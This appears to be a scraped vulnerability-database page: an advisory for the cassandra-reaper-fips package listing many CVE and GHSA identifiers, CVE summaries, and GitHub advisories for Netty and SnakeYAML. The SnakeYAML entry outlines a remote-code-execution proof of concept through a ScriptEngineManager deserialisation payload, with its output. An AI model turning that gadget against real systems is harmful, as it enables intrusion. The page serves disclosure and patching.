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Vulnerability from cleanstart
Multiple security vulnerabilities affect the cassandra-reaper-fips package. These issues are resolved in later releases. See references for individual vulnerability details.
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "cassandra-reaper-fips"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.6.1-r4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the cassandra-reaper-fips package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-GH89210",
"modified": "2026-05-13T14:13:05Z",
"published": "2026-05-18T13:15:02.086653Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-GH89210.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2015-0886"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2020-8908"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2022-1471"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2022-24823"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2022-38752"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2022-41854"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2023-2976"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2023-34462"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2024-12798"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2024-12801"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2024-13009"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2024-47535"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2024-6763"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2024-8184"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2024-9823"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-11143"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-24970"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-25193"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-48734"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-48924"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-52999"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-58057"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1225"
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{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-23901"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-44431"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-44432"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-25qh-j22f-pwp8"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-389x-839f-4rhx"
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{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3p8m-j85q-pgmj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-4g8c-wm8x-jfhw"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5mg8-w23w-74h3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-6mjq-h674-j845"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-6v67-2wr5-gvf4"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-72hv-8253-57qq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-7g45-4rm6-3mm3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9h6p-92jq-888x"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9w3m-gqgf-c4p9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-c4qc-4q9p-m9q9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-g8m5-722r-8whq"
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{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-gc5v-m9x4-r6x2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-h46c-h94j-95f3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-j26w-f9rq-mr2q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-j288-q9x7-2f5v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-jc7h-c423-mpjc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-mf9v-mfxr-j63j"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-mjmj-j48q-9wg2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-pr98-23f8-jwxv"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-q4rv-gq96-w7c5"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qccp-gfcp-xxvc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qh8g-58pp-2wxh"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qqpg-mvqg-649v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-w37g-rhq8-7m4j"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-wjpw-4j6x-6rwh"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-wxr5-93ph-8wr9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xq3w-v528-46rv"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0886"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8908"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1471"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24823"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38752"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41854"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2976"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34462"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12798"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12801"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13009"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47535"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6763"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8184"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9823"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11143"
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{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24970"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25193"
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{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48734"
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{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48924"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52999"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58057"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1225"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23901"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44431"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44432"
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],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for CVE-2015-0886, CVE-2020-8908, CVE-2022-1471, CVE-2022-24823, CVE-2022-38752, CVE-2022-41854, CVE-2023-2976, CVE-2023-34462, CVE-2024-12798, CVE-2024-12801, CVE-2024-13009, CVE-2024-47535, CVE-2024-6763, CVE-2024-8184, CVE-2024-9823, CVE-2025-11143, CVE-2025-24970, CVE-2025-25193, CVE-2025-48734, CVE-2025-48924, CVE-2025-52999, CVE-2025-58057, CVE-2026-1225, CVE-2026-23901, CVE-2026-44431, CVE-2026-44432, ghsa-25qh-j22f-pwp8, ghsa-389x-839f-4rhx, ghsa-3p8m-j85q-pgmj, ghsa-4g8c-wm8x-jfhw, ghsa-5mg8-w23w-74h3, ghsa-6mjq-h674-j845, ghsa-6v67-2wr5-gvf4, ghsa-72hv-8253-57qq, ghsa-7g45-4rm6-3mm3, ghsa-9h6p-92jq-888x, ghsa-9w3m-gqgf-c4p9, ghsa-c4qc-4q9p-m9q9, ghsa-g8m5-722r-8whq, ghsa-gc5v-m9x4-r6x2, ghsa-h46c-h94j-95f3, ghsa-j26w-f9rq-mr2q, ghsa-j288-q9x7-2f5v, ghsa-jc7h-c423-mpjc, ghsa-mf9v-mfxr-j63j, ghsa-mjmj-j48q-9wg2, ghsa-pr98-23f8-jwxv, ghsa-q4rv-gq96-w7c5, ghsa-qccp-gfcp-xxvc, ghsa-qh8g-58pp-2wxh, ghsa-qqpg-mvqg-649v, ghsa-w37g-rhq8-7m4j, ghsa-wjpw-4j6x-6rwh, ghsa-wxr5-93ph-8wr9, ghsa-xq3w-v528-46rv applied in versions: 3.6.1-r0, 3.6.1-r1, 3.6.1-r2, 3.6.1-r3, 3.6.1-r4",
"upstream": [
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"CVE-2020-8908",
"CVE-2022-1471",
"CVE-2022-24823",
"CVE-2022-38752",
"CVE-2022-41854",
"CVE-2023-2976",
"CVE-2023-34462",
"CVE-2024-12798",
"CVE-2024-12801",
"CVE-2024-13009",
"CVE-2024-47535",
"CVE-2024-6763",
"CVE-2024-8184",
"CVE-2024-9823",
"CVE-2025-11143",
"CVE-2025-24970",
"CVE-2025-25193",
"CVE-2025-48734",
"CVE-2025-48924",
"CVE-2025-52999",
"CVE-2025-58057",
"CVE-2026-1225",
"CVE-2026-23901",
"CVE-2026-44431",
"CVE-2026-44432",
"ghsa-25qh-j22f-pwp8",
"ghsa-389x-839f-4rhx",
"ghsa-3p8m-j85q-pgmj",
"ghsa-4g8c-wm8x-jfhw",
"ghsa-5mg8-w23w-74h3",
"ghsa-6mjq-h674-j845",
"ghsa-6v67-2wr5-gvf4",
"ghsa-72hv-8253-57qq",
"ghsa-7g45-4rm6-3mm3",
"ghsa-9h6p-92jq-888x",
"ghsa-9w3m-gqgf-c4p9",
"ghsa-c4qc-4q9p-m9q9",
"ghsa-g8m5-722r-8whq",
"ghsa-gc5v-m9x4-r6x2",
"ghsa-h46c-h94j-95f3",
"ghsa-j26w-f9rq-mr2q",
"ghsa-j288-q9x7-2f5v",
"ghsa-jc7h-c423-mpjc",
"ghsa-mf9v-mfxr-j63j",
"ghsa-mjmj-j48q-9wg2",
"ghsa-pr98-23f8-jwxv",
"ghsa-q4rv-gq96-w7c5",
"ghsa-qccp-gfcp-xxvc",
"ghsa-qh8g-58pp-2wxh",
"ghsa-qqpg-mvqg-649v",
"ghsa-w37g-rhq8-7m4j",
"ghsa-wjpw-4j6x-6rwh",
"ghsa-wxr5-93ph-8wr9",
"ghsa-xq3w-v528-46rv"
]
}
CVE-2022-24823 (GCVE-0-2022-24823)
Vulnerability from cvelistv5 – Published: 2022-05-06 12:05 – Updated: 2025-04-22 18:01| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
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|||||||||||||||||
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CVE-2025-11143 (GCVE-0-2025-11143)
Vulnerability from cvelistv5 – Published: 2026-03-05 09:26 – Updated: 2026-03-05 14:48- CWE-20 - Improper Input Validation
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Eclipse Foundation | Eclipse Jetty |
Affected:
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CVE-2026-1225 (GCVE-0-2026-1225)
Vulnerability from cvelistv5 – Published: 2026-01-22 09:24 – Updated: 2026-01-22 14:14- CWE-20 - Improper Input Validation
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CVE-2025-58057 (GCVE-0-2025-58057)
Vulnerability from cvelistv5 – Published: 2025-09-03 21:46 – Updated: 2025-09-04 19:59- CWE-409 - Improper Handling of Highly Compressed Data (Data Amplification)
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CVE-2025-25193 (GCVE-0-2025-25193)
Vulnerability from cvelistv5 – Published: 2025-02-10 22:02 – Updated: 2025-02-21 18:03- CWE-400 - Uncontrolled Resource Consumption
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CVE-2026-23901 (GCVE-0-2026-23901)
Vulnerability from cvelistv5 – Published: 2026-02-10 09:25 – Updated: 2026-02-10 15:31- CWE-208 - Observable Timing Discrepancy
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CVE-2022-38752 (GCVE-0-2022-38752)
Vulnerability from cvelistv5 – Published: 2022-09-05 00:00 – Updated: 2024-08-03 11:02- CWE-121 - Stack-based Buffer Overflow
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CVE-2025-52999 (GCVE-0-2025-52999)
Vulnerability from cvelistv5 – Published: 2025-06-25 17:02 – Updated: 2025-06-25 18:04- CWE-121 - Stack-based Buffer Overflow
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CVE-2025-48924 (GCVE-0-2025-48924)
Vulnerability from cvelistv5 – Published: 2025-07-11 14:56 – Updated: 2025-11-04 22:06- CWE-674 - Uncontrolled Recursion
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Vulnerability from cvelistv5 – Published: 2023-06-14 17:36 – Updated: 2026-02-25 16:57- Creation of Temporary File With Insecure Permissions
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CVE-2015-0886 (GCVE-0-2015-0886)
Vulnerability from cvelistv5 – Published: 2015-02-28 02:00 – Updated: 2024-08-06 04:26- n/a
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CVE-2026-44432 (GCVE-0-2026-44432)
Vulnerability from cvelistv5 – Published: 2026-05-13 15:17 – Updated: 2026-07-02 12:04- CWE-409 - Improper Handling of Highly Compressed Data (Data Amplification)
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CVE-2022-41854 (GCVE-0-2022-41854)
Vulnerability from cvelistv5 – Published: 2022-11-11 13:10 – Updated: 2024-09-16 16:24- CWE-121 - Stack-based Buffer Overflow
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CVE-2024-9823 (GCVE-0-2024-9823)
Vulnerability from cvelistv5 – Published: 2024-10-14 15:03 – Updated: 2025-11-03 19:35- CWE-400 - Uncontrolled Resource Consumption
| Vendor | Product | Version | |||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
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CVE-2023-34462 (GCVE-0-2023-34462)
Vulnerability from cvelistv5 – Published: 2023-06-22 23:00 – Updated: 2025-02-13 16:55- CWE-400 - Uncontrolled Resource Consumption
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CVE-2022-1471 (GCVE-0-2022-1471)
Vulnerability from cvelistv5 – Published: 2022-12-01 10:47 – Updated: 2025-06-18 08:32- CWE-20 - Improper Input Validation
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CVE-2024-6763 (GCVE-0-2024-6763)
Vulnerability from cvelistv5 – Published: 2024-10-14 15:06 – Updated: 2025-03-07 00:10| Vendor | Product | Version | ||
|---|---|---|---|---|
| Eclipse Foundation | Jetty |
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7.0.0 , ≤ 12.0.11
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CVE-2025-24970 (GCVE-0-2025-24970)
Vulnerability from cvelistv5 – Published: 2025-02-10 21:57 – Updated: 2025-04-16 15:37- CWE-20 - Improper Input Validation
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CVE-2024-47535 (GCVE-0-2024-47535)
Vulnerability from cvelistv5 – Published: 2024-11-12 15:50 – Updated: 2024-11-13 20:44- CWE-400 - Uncontrolled Resource Consumption
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CVE-2025-48734 (GCVE-0-2025-48734)
Vulnerability from cvelistv5 – Published: 2025-05-28 13:32 – Updated: 2026-04-29 03:55- CWE-284 - Improper Access Control
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Apache Software Foundation | Apache Commons BeanUtils 1.x |
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CVE-2024-12801 (GCVE-0-2024-12801)
Vulnerability from cvelistv5 – Published: 2024-12-19 16:11 – Updated: 2025-01-03 13:40- CWE-918 - Server-Side Request Forgery (SSRF)
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CVE-2024-8184 (GCVE-0-2024-8184)
Vulnerability from cvelistv5 – Published: 2024-10-14 15:09 – Updated: 2025-11-03 19:34- CWE-400 - Uncontrolled Resource Consumption
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Eclipse Foundation | Jetty |
Affected:
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CVE-2020-8908 (GCVE-0-2020-8908)
Vulnerability from cvelistv5 – Published: 2020-12-10 22:10 – Updated: 2024-08-04 10:12- CWE-378 - Creation of Temporary File With Insecure Permissions
| URL | Tags | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Google LLC | Guava |
Affected:
1.0 , < 32.0
(custom)
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"name": "[drill-dev] 20210618 [GitHub] [drill] ssainz edited a comment on issue #2260: CVE-2020-8908 in Guava v.28.2-jre, should upgrade to v.30.1.1",
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"x_refsource_MLIST"
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"url": "https://lists.apache.org/thread.html/r2fe45d96eea8434b91592ca08109118f6308d60f6d0e21d52438cfb4%40%3Cdev.drill.apache.org%3E"
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"name": "[maven-issues] 20210122 [GitHub] [maven-indexer] akurtakov opened a new pull request #75: Remove guava dependency from indexer-core",
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"refsource": "MLIST",
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CVE-2026-44431 (GCVE-0-2026-44431)
Vulnerability from cvelistv5 – Published: 2026-05-13 15:20 – Updated: 2026-06-26 11:01- CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
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CVE-2024-12798 (GCVE-0-2024-12798)
Vulnerability from cvelistv5 – Published: 2024-12-19 15:14 – Updated: 2025-01-03 13:38- CWE-917 - Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
| Vendor | Product | Version | ||
|---|---|---|---|---|
| QOS.CH Sarl | Logback-core |
Affected:
0.1 , ≤ 1.3.14
(maven)
Affected: 1.4.0 , ≤ 1.5.12 (maven) Unaffected: 1.3.15 Unaffected: 1.5.13 |
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CVE-2024-13009 (GCVE-0-2024-13009)
Vulnerability from cvelistv5 – Published: 2025-05-08 17:29 – Updated: 2025-05-08 18:56 Unsupported When Assigned- CWE-404 - Improper Resource Shutdown or Release
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Eclipse Foundation | Jetty |
Affected:
9.4.0 , ≤ 9.4.56
(semver)
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GHSA-4G8C-WM8X-JFHW
Vulnerability from github – Published: 2025-02-10 17:38 – Updated: 2025-04-16 19:30Impact
When a special crafted packet is received via SslHandler it doesn't correctly handle validation of such a packet in all cases which can lead to a native crash.
Workarounds
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SslContext context = ...;
SslHandler handler = context.newHandler(....);
to:
SslContext context = ...;
SSLEngine engine = context.newEngine(....);
SslHandler handler = new SslHandler(engine, ....);
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{
"type": "WEB",
"url": "https://www.vicarius.io/vsociety/posts/cve-2025-24970-netty-vulnerability-mitigation"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "SslHandler doesn\u0027t correctly validate packets which can lead to native crash when using native SSLEngine"
}
GHSA-MJMJ-J48Q-9WG2
Vulnerability from github – Published: 2022-12-12 21:19 – Updated: 2025-06-18 17:45Summary
SnakeYaml's Constructor class, which inherits from SafeConstructor, allows
any type be deserialized given the following line:
new Yaml(new Constructor(TestDataClass.class)).load(yamlContent);
Types do not have to match the types of properties in the
target class. A ConstructorException is thrown, but only after a malicious
payload is deserialized.
Severity
High, lack of type checks during deserialization allows remote code execution.
Proof of Concept
Execute bash run.sh. The PoC uses Constructor to deserialize a payload
for RCE. RCE is demonstrated by using a payload which performs a http request to
http://127.0.0.1:8000.
Example output of successful run of proof of concept:
$ bash run.sh
[+] Downloading snakeyaml if needed
[+] Starting mock HTTP server on 127.0.0.1:8000 to demonstrate RCE
nc: no process found
[+] Compiling and running Proof of Concept, which a payload that sends a HTTP request to mock web server.
[+] An exception is expected.
Exception:
Cannot create property=payload for JavaBean=Main$TestDataClass@3cbbc1e0
in 'string', line 1, column 1:
payload: !!javax.script.ScriptEn ...
^
Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager
in 'string', line 1, column 10:
payload: !!javax.script.ScriptEngineManag ...
^
at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:291)
at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.construct(Constructor.java:172)
at org.yaml.snakeyaml.constructor.Constructor$ConstructYamlObject.construct(Constructor.java:332)
at org.yaml.snakeyaml.constructor.BaseConstructor.constructObjectNoCheck(BaseConstructor.java:230)
at org.yaml.snakeyaml.constructor.BaseConstructor.constructObject(BaseConstructor.java:220)
at org.yaml.snakeyaml.constructor.BaseConstructor.constructDocument(BaseConstructor.java:174)
at org.yaml.snakeyaml.constructor.BaseConstructor.getSingleData(BaseConstructor.java:158)
at org.yaml.snakeyaml.Yaml.loadFromReader(Yaml.java:491)
at org.yaml.snakeyaml.Yaml.load(Yaml.java:416)
at Main.main(Main.java:37)
Caused by: java.lang.IllegalArgumentException: Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager
at java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:167)
at java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:171)
at java.base/jdk.internal.reflect.UnsafeObjectFieldAccessorImpl.set(UnsafeObjectFieldAccessorImpl.java:81)
at java.base/java.lang.reflect.Field.set(Field.java:780)
at org.yaml.snakeyaml.introspector.FieldProperty.set(FieldProperty.java:44)
at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:286)
... 9 more
[+] Dumping Received HTTP Request. Will not be empty if PoC worked
GET /proof-of-concept HTTP/1.1
User-Agent: Java/11.0.14
Host: localhost:8000
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Further Analysis
Potential mitigations include, leveraging SnakeYaml's SafeConstructor while parsing untrusted content.
See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64581479 for discussion on the subject.
Timeline
Date reported: 4/11/2022 Date fixed: 30/12/2022 Date disclosed: 10/13/2022
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.33"
},
"package": {
"ecosystem": "Maven",
"name": "org.yaml:snakeyaml"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-1471"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2022-12-12T21:19:47Z",
"nvd_published_at": "2022-12-01T11:15:00Z",
"severity": "HIGH"
},
"details": "### Summary\nSnakeYaml\u0027s `Constructor` class, which inherits from `SafeConstructor`, allows\nany type be deserialized given the following line:\n\nnew Yaml(new Constructor(TestDataClass.class)).load(yamlContent);\n\nTypes do not have to match the types of properties in the\ntarget class. A `ConstructorException` is thrown, but only after a malicious\npayload is deserialized.\n\n### Severity\nHigh, lack of type checks during deserialization allows remote code execution.\n\n### Proof of Concept\nExecute `bash run.sh`. The PoC uses Constructor to deserialize a payload\nfor RCE. RCE is demonstrated by using a payload which performs a http request to\nhttp://127.0.0.1:8000.\n\nExample output of successful run of proof of concept:\n\n```\n$ bash run.sh\n\n[+] Downloading snakeyaml if needed\n[+] Starting mock HTTP server on 127.0.0.1:8000 to demonstrate RCE\nnc: no process found\n[+] Compiling and running Proof of Concept, which a payload that sends a HTTP request to mock web server.\n[+] An exception is expected.\nException:\nCannot create property=payload for JavaBean=Main$TestDataClass@3cbbc1e0\n in \u0027string\u0027, line 1, column 1:\n payload: !!javax.script.ScriptEn ... \n ^\nCan not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager\n in \u0027string\u0027, line 1, column 10:\n payload: !!javax.script.ScriptEngineManag ... \n ^\n\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:291)\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.construct(Constructor.java:172)\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructYamlObject.construct(Constructor.java:332)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.constructObjectNoCheck(BaseConstructor.java:230)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.constructObject(BaseConstructor.java:220)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.constructDocument(BaseConstructor.java:174)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.getSingleData(BaseConstructor.java:158)\n\tat org.yaml.snakeyaml.Yaml.loadFromReader(Yaml.java:491)\n\tat org.yaml.snakeyaml.Yaml.load(Yaml.java:416)\n\tat Main.main(Main.java:37)\nCaused by: java.lang.IllegalArgumentException: Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager\n\tat java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:167)\n\tat java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:171)\n\tat java.base/jdk.internal.reflect.UnsafeObjectFieldAccessorImpl.set(UnsafeObjectFieldAccessorImpl.java:81)\n\tat java.base/java.lang.reflect.Field.set(Field.java:780)\n\tat org.yaml.snakeyaml.introspector.FieldProperty.set(FieldProperty.java:44)\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:286)\n\t... 9 more\n[+] Dumping Received HTTP Request. Will not be empty if PoC worked\nGET /proof-of-concept HTTP/1.1\nUser-Agent: Java/11.0.14\nHost: localhost:8000\nAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\nConnection: keep-alive\n```\n\n### Further Analysis\nPotential mitigations include, leveraging SnakeYaml\u0027s SafeConstructor while parsing untrusted content.\n\nSee https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64581479 for discussion on the subject.\n\n### Timeline\n**Date reported**: 4/11/2022\n**Date fixed**: [30/12/2022](https://bitbucket.org/snakeyaml/snakeyaml/pull-requests/44)\n**Date disclosed**: 10/13/2022",
"id": "GHSA-mjmj-j48q-9wg2",
"modified": "2025-06-18T17:45:18Z",
"published": "2022-12-12T21:19:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1471"
},
{
"type": "WEB",
"url": "https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true"
},
{
"type": "WEB",
"url": "https://snyk.io/blog/unsafe-deserialization-snakeyaml-java-cve-2022-1471"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20240621-0006"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20230818-0015"
},
{
"type": "WEB",
"url": "https://infosecwriteups.com/%EF%B8%8F-inside-the-160-comment-fight-to-fix-snakeyamls-rce-default-1a20c5ca4d4c"
},
{
"type": "WEB",
"url": "https://groups.google.com/g/kubernetes-security-announce/c/mwrakFaEdnc"
},
{
"type": "WEB",
"url": "https://github.com/mbechler/marshalsec"
},
{
"type": "WEB",
"url": "https://confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html"
},
{
"type": "WEB",
"url": "https://bitbucket.org/snakeyaml/snakeyaml/wiki/CVE-2022-1471"
},
{
"type": "WEB",
"url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64876314"
},
{
"type": "WEB",
"url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64634374"
},
{
"type": "WEB",
"url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64581479"
},
{
"type": "WEB",
"url": "https://bitbucket.org/snakeyaml/snakeyaml/commits/acc44099f5f4af26ff86b4e4e4cc1c874e2dc5c4"
},
{
"type": "WEB",
"url": "https://bitbucket.org/snakeyaml/snakeyaml/commits/5014df1a36f50aca54405bb8433bc99a8847f758"
},
{
"type": "PACKAGE",
"url": "https://bitbucket.org/snakeyaml/snakeyaml"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/175095/PyTorch-Model-Server-Registration-Deserialization-Remote-Code-Execution.html"
},
{
"type": "WEB",
